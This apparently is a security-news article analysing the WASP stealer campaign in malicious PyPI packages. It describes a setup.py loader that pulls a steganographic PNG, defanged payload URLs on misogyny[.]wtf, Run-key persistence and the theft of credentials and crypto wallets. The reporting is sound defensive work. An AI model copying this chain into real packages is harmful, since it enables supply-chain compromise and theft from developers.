Steganography and Polymorphism have been the technique of obfuscating Code in a Malware Attack. There have may such Malware Attacks that find its way to victims through these techniques. Legacy Malwares, have also been experimented upon through the use of Steganography and Polymorphism, to be served on Victims to manage Cyber Attack. The revelation by the Security Community, Phylum and CheckPoint has reported the a new version of the “WASP” malicious, being modified by using Steganography and Polymorphism This Attack is said to be using Python packages on supply chain solutions, in which the distribution is configured as an information stealer. Checkmarx supply chain security research team tracked the actors behind those attacks as the threat actor “WASP.” The Wasp malware has been making its rounds since year 2015, but this iteration of the said malware has been designed to steal credentials, personal information, and cryptocurrency, using steganography and polymorphism to its best to evade detection. The Malware is found to be an Information Stealing trojan hides in malicious PyPI packages on GitHub, etc.
Anatomy of the WASP Stealer Malware
The manipulation of the legacy code has been done this time to allow the user to enable copying of existing popular libraries and injecting a malicious ‘import’ statement into them. The purpose of the injected code is to infect the victim’s machine with a script that runs in the background. The script, which fetches the victim’s geolocation, contains a modified version of an information stealer (Wasp). The attackers have managed to infect hundreds of victims to date, while actively releasing new packages to continue the campaign. Steganography is used to hide the malicious code inside packages. The payload is polymorphic, meaning that different code results each time the second and third stage URLs are loaded, which helps evade detection and ensures persistence.
The Code Level Actions by WASP Stealer
- After installing the package, the setup.py script is executed, and additional Python packages are installed. One of the packages is judyb, and it provides steganography utilities.
- Next, the setup.py script downloads a .png image from this address and saves it in the operating system’s temp directory.
- Then, the setup.py script uses the “lsb.reveal” function, which is located in the freshly installed judyb package, to extract a hidden code from the image downloaded.
- The majority of the data is base64-encoded. Once the Malware decods itself, the code level modification is carried out after decryption on the system.
- Once the code in the previous stage is executed, it fetches another piece of code from this URL “hxxp://misogyny[.]wtf/inject/UsRjS959Rqm4sPG4”.
- The response code is polymorphic (as we’ll discuss in the next chapter) and highly obfuscated.
- The juicy code in this stage is gzip encoded, so the first instruction executed is to decode it and load it. Once this happens: (1) Additional code from “hxxp://misogyny[.]wtf/grab/UsRjS959Rqm4sPG4” is fetched and stored as a file in the operating system’s temp directory with a random name. (2) The code modifies the registry key — ` HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run`so that this python code will be persistent across reboots.
- Now the infection of the machine has been achieved, and the persistent script is now running in the background. This modified version of the WASP stealer malware then grabs all the Discord accounts, all the passwords, crypto wallets, details of the credit cards, and all the interesting files on the victim’s PC. (This script also fetches the victim’s geolocation).
Conclusion
The perpetrator is reported to be selling copies of WASP for USD 20 to other criminals, with payment coming in cryptocurrency or gift cards. The threat actor behind these attacks is offering their malware on cybercrime forums, claiming the code is fully undetected. The simple and lethal technique being used by creating fake GitHub accounts and sharing poisoned snippets has proven to trick hundreds of users into this campaign. Since the beginning of the campaign, the attacker has been successful in creating tens of new Python packages and also mimic legitimate libraries and accounts. The “WASP” is well manipulated to also make it persistent, hence the detection is not very easy.